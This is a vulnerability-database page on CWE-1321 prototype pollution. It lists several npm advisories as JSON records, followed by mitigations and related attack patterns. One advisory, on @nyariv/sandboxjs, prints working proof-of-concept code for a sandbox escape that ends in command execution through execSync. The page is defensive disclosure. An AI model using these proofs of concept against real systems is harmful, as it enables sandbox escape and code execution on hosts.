Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

778 vulnerabilities reference this CWE, most recent first.

GHSA-WPGH-HMV4-R3V5

Vulnerability from github – Published: 2021-06-21 17:18 – Updated: 2021-05-20 21:52
VLAI
Summary
Prototype pollution in safe-obj
Details

Prototype pollution vulnerability in 'safe-obj' versions 1.0.0 through 1.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "safe-obj"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "last_affected": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-25928"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-20T21:52:15Z",
    "nvd_published_at": "2021-04-26T11:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Prototype pollution vulnerability in \u0027safe-obj\u0027 versions 1.0.0 through 1.0.2 allows an attacker to cause a denial of service and may lead to remote code execution.",
  "id": "GHSA-wpgh-hmv4-r3v5",
  "modified": "2021-05-20T21:52:15Z",
  "published": "2021-06-21T17:18:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25928"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mantacode/safe-obj/blob/6ab63529182b6cf11704ac84f10800290afd3f9f/lib/index.js#L122"
    },
    {
      "type": "WEB",
      "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25928"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in safe-obj"
}

GHSA-WQPM-VFFM-39W4

Vulnerability from github – Published: 2025-02-06 06:31 – Updated: 2025-02-06 18:31
VLAI
Details

A prototype pollution in the lib.merge function of cli-util v1.1.27 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-57078"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-05T22:15:32Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution in the lib.merge function of cli-util v1.1.27 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
  "id": "GHSA-wqpm-vffm-39w4",
  "modified": "2025-02-06T18:31:05Z",
  "published": "2025-02-06T06:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57078"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/tariqhawis/b58d7274d67e7b9fed4bd51368388a23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WRWR-H859-XH2R

Vulnerability from github – Published: 2026-05-14 16:17 – Updated: 2026-05-14 16:17
VLAI
Summary
n8n Has an XML Node Prototype Pollution Patch Bypass
Details

Impact

An authenticated user with permission to create or modify workflows could bypass the patch for GHSA-hqr4-h3xv-9m3r in the XML node. When combined with other nodes, this could lead to RCE on the n8n host.

Patches

The issue has been fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1. Users should upgrade to one of these versions or later to remediate the vulnerability.

Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Limit workflow creation and editing permissions to fully trusted users only. - Disable the XML node by adding n8n-nodes-base.xml to the NODES_EXCLUDE environment variable.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.


n8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.123.43"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.21.0"
            },
            {
              "fixed": "2.22.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "n8n"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-rc.0"
            },
            {
              "fixed": "2.20.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44791"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T16:17:49Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Impact\nAn authenticated user with permission to create or modify workflows could bypass the patch for GHSA-hqr4-h3xv-9m3r in the XML node. When combined with other nodes, this could lead to RCE on the n8n host.\n\n## Patches\nThe issue has been fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1. Users should upgrade to one of these versions or later to remediate the vulnerability.\n\n## Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n- Limit workflow creation and editing permissions to fully trusted users only.\n- Disable the XML node by adding `n8n-nodes-base.xml` to the `NODES_EXCLUDE` environment variable.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.\n\n---\nn8n has adopted CVSS 4.0 as primary score for all security advisories. CVSS 3.1 vector strings are provided for backwards compatibility.\n\nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  "id": "GHSA-wrwr-h859-xh2r",
  "modified": "2026-05-14T16:17:49Z",
  "published": "2026-05-14T16:17:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-wrwr-h859-xh2r"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-hqr4-h3xv-9m3r"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/n8n-io/n8n"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "n8n Has an XML Node Prototype Pollution Patch Bypass"
}

GHSA-WVR2-Q86M-6WHP

Vulnerability from github – Published: 2023-01-07 21:30 – Updated: 2023-01-12 22:47
VLAI
Summary
Baobab vulnerable to Prototype Pollution
Details

A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be launched remotely. Upgrading to version 2.6.1 is able to address this issue. The name of the patch is c56639532a923d9a1600fb863ec7551b188b5d19. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217627.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "baobab"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-4307"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-09T21:54:36Z",
    "nvd_published_at": "2023-01-07T20:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes (\u0027prototype pollution\u0027). The attack can be launched remotely. Upgrading to version 2.6.1 is able to address this issue. The name of the patch is c56639532a923d9a1600fb863ec7551b188b5d19. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217627.",
  "id": "GHSA-wvr2-q86m-6whp",
  "modified": "2023-01-12T22:47:31Z",
  "published": "2023-01-07T21:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4307"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Yomguithereal/baobab/pull/511"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Yomguithereal/baobab/commit/c56639532a923d9a1600fb863ec7551b188b5d19"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Yomguithereal/baobab"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Yomguithereal/baobab/releases/tag/2.6.1"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.217627"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.217627"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Baobab vulnerable to Prototype Pollution"
}

GHSA-WW7G-4GWX-M7WJ

Vulnerability from github – Published: 2026-02-10 00:24 – Updated: 2026-02-10 02:56
VLAI
Summary
@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)
Details

Summary

A sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)).

Details

Root Cause:

The sandbox implements a protection mechanism using the isGlobal flag in the Prop class to prevent modification of global objects and their prototypes. However, this taint tracking is lost when values pass through array/object literal creation.

Vulnerable Code Path src/executor.ts(L559-L571):

addOps(LispType.CreateArray, (exec, done, ticks, a, b: Lisp[], obj, context, scope) => {
  const items = (b as LispItem[])
    .map((item) => {
      if (item instanceof SpreadArray) {
        return [...item.item];
      } else {
        return item;
      }
    })
    .flat()
    .map((item) => valueOrProp(item, context));  // <- isGlobal flag lost here
  done(undefined, items);
});

Exploitation Flow:

Sandboxed code: const m=[Map.prototype][0]
              ↓
Array creation: isGlobal taint stripped via valueOrProp()
              ↓
Prototype mutation: m.cmd='id' (host prototype polluted)
              ↓
Host-side impact: new Map().cmd === 'id' (persistent)
              ↓
RCE (application-dependent): host code calls execSync(obj.cmd)

Protection Bypass Location src/utils.ts(L380-L385):

set(key: string, val: unknown) {
  // ...
  if (prop.isGlobal) {  // <- This check is bypassed
    throw new SandboxError(`Cannot override global variable '${key}'`);
  }
  (prop.context as any)[prop.prop] = val;
  return prop;
}

When the prototype is accessed via array retrieval, the isGlobal flag is no longer set, so this protection is never triggered.

PoC

Prototype pollution via array intermediary:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const arr=[Map.prototype];
  const p=arr[0];
  p.polluted='pwned';
  return 'done';
`)().run();

console.log('polluted' in ({}), new Map().polluted);

Observed output: false pwned

Overwrite Set.prototype.has:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const s=[Set.prototype][0];
  s.has=isFinite;
  return 'done';
`)().run();

console.log('has overwritten:', Set.prototype.has === isFinite);

Observed output: has overwritten: true

RCE via host gadget (prototype pollution -> execSync):

const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');
const sandbox = new Sandbox();

sandbox.compile(`
  const m=[Map.prototype][0];
  m.cmd='id';
  return 'done';
`)().run();

const obj = new Map();
const out = execSync(obj.cmd, { encoding: 'utf8' }).trim();
console.log(out);

Observed output: uid=501(user) gid=20(staff) groups=20(staff),...

Impact

This is a sandbox escape: untrusted sandboxed code can persistently mutate host built-in prototypes (e.g., Map.prototype, Set.prototype), breaking isolation and impacting subsequent host execution. RCE is possible in applications that later use attacker-controlled (polluted) properties in sensitive sinks (e.g., passing obj.cmd to child_process.execSync).

Affected Systems: any application using @nyariv/sandboxjs to execute untrusted JavaScript.

Remediation

  • Preserve isGlobal protection across array/object literal creation (do not unwrap Prop into raw values in a way that drops the global/prototype taint).
  • Add a hard block on writes to built-in prototypes (e.g., Map.prototype, Set.prototype, etc.) even if they are obtained indirectly through literals.
  • Defense-in-depth: freeze built-in prototypes in the host process before running untrusted code (may be breaking for some consumers).
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.30"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.31"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25881"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T00:24:53Z",
    "nvd_published_at": "2026-02-09T22:16:03Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the `isGlobal` protection flag through array literal intermediaries. When a global prototype reference (e.g., `Map.prototype`, `Set.prototype`) is placed into an array and retrieved, the `isGlobal` taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: `execSync(obj.cmd)`).\n\n### Details\n#### Root Cause:\nThe sandbox implements a protection mechanism using the `isGlobal` flag in the Prop class to prevent modification of global objects and their prototypes. However, this taint tracking is lost when values pass through array/object literal creation.\n\n#### Vulnerable Code Path `src/executor.ts`([L559-L571](https://github.com/nyariv/SandboxJS/blob/main/src/executor.ts#L559-L571)):\n```ts\naddOps(LispType.CreateArray, (exec, done, ticks, a, b: Lisp[], obj, context, scope) =\u003e {\n  const items = (b as LispItem[])\n    .map((item) =\u003e {\n      if (item instanceof SpreadArray) {\n        return [...item.item];\n      } else {\n        return item;\n      }\n    })\n    .flat()\n    .map((item) =\u003e valueOrProp(item, context));  // \u003c- isGlobal flag lost here\n  done(undefined, items);\n});\n```\n#### Exploitation Flow:\n```txt\nSandboxed code: const m=[Map.prototype][0]\n              \u2193\nArray creation: isGlobal taint stripped via valueOrProp()\n              \u2193\nPrototype mutation: m.cmd=\u0027id\u0027 (host prototype polluted)\n              \u2193\nHost-side impact: new Map().cmd === \u0027id\u0027 (persistent)\n              \u2193\nRCE (application-dependent): host code calls execSync(obj.cmd)\n```\n\n#### Protection Bypass Location `src/utils.ts`([L380-L385](https://github.com/nyariv/SandboxJS/blob/main/src/utils.ts#L380-L385)):\n```ts\nset(key: string, val: unknown) {\n  // ...\n  if (prop.isGlobal) {  // \u003c- This check is bypassed\n    throw new SandboxError(`Cannot override global variable \u0027${key}\u0027`);\n  }\n  (prop.context as any)[prop.prop] = val;\n  return prop;\n}\n```\nWhen the prototype is accessed via array retrieval, the `isGlobal` flag is no longer set, so this protection is never triggered.\n\n### PoC\n#### Prototype pollution via array intermediary:\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst sandbox = new Sandbox();\n\nsandbox.compile(`\n  const arr=[Map.prototype];\n  const p=arr[0];\n  p.polluted=\u0027pwned\u0027;\n  return \u0027done\u0027;\n`)().run();\n\nconsole.log(\u0027polluted\u0027 in ({}), new Map().polluted);\n```\n**Observed output**: `false pwned`\n\n#### Overwrite `Set.prototype.has`:\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst sandbox = new Sandbox();\n\nsandbox.compile(`\n  const s=[Set.prototype][0];\n  s.has=isFinite;\n  return \u0027done\u0027;\n`)().run();\n\nconsole.log(\u0027has overwritten:\u0027, Set.prototype.has === isFinite);\n```\n\n**Observed output**: `has overwritten: true`\n\n#### RCE via host gadget (prototype pollution -\u003e execSync):\n```js\nconst Sandbox = require(\u0027@nyariv/sandboxjs\u0027).default;\nconst { execSync } = require(\u0027child_process\u0027);\nconst sandbox = new Sandbox();\n\nsandbox.compile(`\n  const m=[Map.prototype][0];\n  m.cmd=\u0027id\u0027;\n  return \u0027done\u0027;\n`)().run();\n\nconst obj = new Map();\nconst out = execSync(obj.cmd, { encoding: \u0027utf8\u0027 }).trim();\nconsole.log(out);\n```\n\n**Observed output**: `uid=501(user) gid=20(staff) groups=20(staff),...`\n\n### Impact\nThis is a sandbox escape: untrusted sandboxed code can persistently mutate host built-in prototypes (e.g., `Map.prototype`, `Set.prototype`), breaking isolation and impacting subsequent host execution. RCE is possible in applications that later use attacker-controlled (polluted) properties in sensitive sinks (e.g., passing `obj.cmd` to `child_process.execSync`).\n\n**Affected Systems**: any application using `@nyariv/sandboxjs` to execute untrusted JavaScript.\n\n### Remediation\n- Preserve `isGlobal` protection across array/object literal creation (do not unwrap `Prop` into raw values in a way that drops the global/prototype taint).\n- Add a hard block on writes to built-in prototypes (e.g., `Map.prototype`, `Set.prototype`, etc.) even if they are obtained indirectly through literals.\n- Defense-in-depth: freeze built-in prototypes in the host process before running untrusted code (may be breaking for some consumers).",
  "id": "GHSA-ww7g-4gwx-m7wj",
  "modified": "2026-02-10T02:56:33Z",
  "published": "2026-02-10T00:24:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-ww7g-4gwx-m7wj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25881"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/commit/f369f8db26649f212a6a9a2e7a1624cb2f705b53"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@nyariv/sandboxjs has host prototype pollution from sandbox via array intermediary (sandbox escape)"
}

GHSA-WW98-MRX2-M82H

Vulnerability from github – Published: 2025-04-08 21:31 – Updated: 2025-04-08 21:31
VLAI
Details

Prototype Pollution in Kibana can lead to code injection via unrestricted file upload combined with path traversal.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-12556"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-08T20:15:19Z",
    "severity": "HIGH"
  },
  "details": "Prototype Pollution in Kibana can lead to code injection via unrestricted file upload combined with path traversal.",
  "id": "GHSA-ww98-mrx2-m82h",
  "modified": "2025-04-08T21:31:40Z",
  "published": "2025-04-08T21:31:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12556"
    },
    {
      "type": "WEB",
      "url": "https://discuss.elastic.co/t/kibana-8-16-4-and-8-17-2-security-update-esa-2025-02/376918"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WWG2-2CRQ-6GRR

Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-06-17 21:38
VLAI
Summary
Prototype pollution in @strikeentco/set
Details

Prototype pollution vulnerability in '@strikeentco/set' version 1.0.0 allows attacker to cause a denial of service and may lead to remote code execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@strikeentco/set"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.0.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2020-28267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-17T21:38:52Z",
    "nvd_published_at": "2020-11-10T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "Prototype pollution vulnerability in \u0027@strikeentco/set\u0027 version 1.0.0 allows attacker to cause a denial of service and may lead to remote code execution.",
  "id": "GHSA-wwg2-2crq-6grr",
  "modified": "2022-06-17T21:38:52Z",
  "published": "2022-05-24T17:34:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28267"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strikeentco/set/commit/102cc6b2e1d1e0c928ced87e75df759d5541ff60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strikeentco/set"
    },
    {
      "type": "WEB",
      "url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28267"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in @strikeentco/set"
}

GHSA-WWXH-74FX-33C6

Vulnerability from github – Published: 2023-05-01 14:01 – Updated: 2023-05-01 14:01
VLAI
Summary
Possible prototype pollution in metadata record, when using meta decorator
Details

Impact

Possible prototype pollution for the MetadataRecord, when merged with a base class' metadata object, in meta decorator from the @aedart/support package.

The likelihood is questionable, given that a class' metadata can only be set or altered when the class is decorated via meta(). Furthermore, object(s) of sensitive nature would have to be stored as metadata, before this can become a vulnerability.

Patches

Has been patched in version 0.6.1.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@aedart/support"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-30857"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-05-01T14:01:02Z",
    "nvd_published_at": "2023-04-28T21:15:09Z",
    "severity": "LOW"
  },
  "details": "### Impact\n\nPossible prototype pollution for the `MetadataRecord`, when merged with a base class\u0027 metadata object, in `meta` decorator from the `@aedart/support` package.\n\nThe likelihood is questionable, given that a class\u0027 metadata can only be set or altered when the class is decorated via `meta()`. Furthermore, object(s) of sensitive nature would have to be stored as metadata, before this can become a vulnerability.\n### Patches\n\nHas been patched in version `0.6.1`.\n",
  "id": "GHSA-wwxh-74fx-33c6",
  "modified": "2023-05-01T14:01:02Z",
  "published": "2023-05-01T14:01:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aedart/ion/security/advisories/GHSA-wwxh-74fx-33c6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30857"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aedart/ion/commit/c3e2ee08710d4164d796ecb66ed291335dae9291"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aedart/ion"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Possible prototype pollution in metadata record, when using meta decorator"
}

GHSA-WX5G-37JH-9GCR

Vulnerability from github – Published: 2022-10-20 12:00 – Updated: 2022-10-21 19:01
VLAI
Details

Prototype pollution vulnerability in function DEFNODE in ast.js in mishoo UglifyJS 3.13.2 via the name variable in ast.js.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-37598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-20T11:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Prototype pollution vulnerability in function DEFNODE in ast.js in mishoo UglifyJS 3.13.2 via the name variable in ast.js.",
  "id": "GHSA-wx5g-37jh-9gcr",
  "modified": "2022-10-21T19:01:14Z",
  "published": "2022-10-20T12:00:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37598"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mishoo/UglifyJS/issues/5699"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mishoo/UglifyJS/issues/5721#issuecomment-1292849604"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mishoo/UglifyJS/blob/352a944868b09c9ce3121a49d4a0bf0afe370a35/lib/ast.js#L46"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mishoo/UglifyJS/blob/352a944868b09c9ce3121a49d4a0bf0afe370a35/lib/ast.js#L79"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-WXFJ-84XF-7GXV

Vulnerability from github – Published: 2023-02-28 06:30 – Updated: 2023-03-08 23:14
VLAI
Summary
mde utilities contains Prototype Pollution
Details

All versions of the package utilities are vulnerable to Prototype Pollution via the _mix function.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "utilities"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26105"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-06T21:55:12Z",
    "nvd_published_at": "2023-02-28T05:15:00Z",
    "severity": "HIGH"
  },
  "details": "All versions of the package utilities are vulnerable to Prototype Pollution via the _mix function.",
  "id": "GHSA-wxfj-84xf-7gxv",
  "modified": "2023-03-08T23:14:00Z",
  "published": "2023-02-28T06:30:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26105"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mde/utilities/issues/29"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-UTILITIES-3184491"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mde utilities contains Prototype Pollution"
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.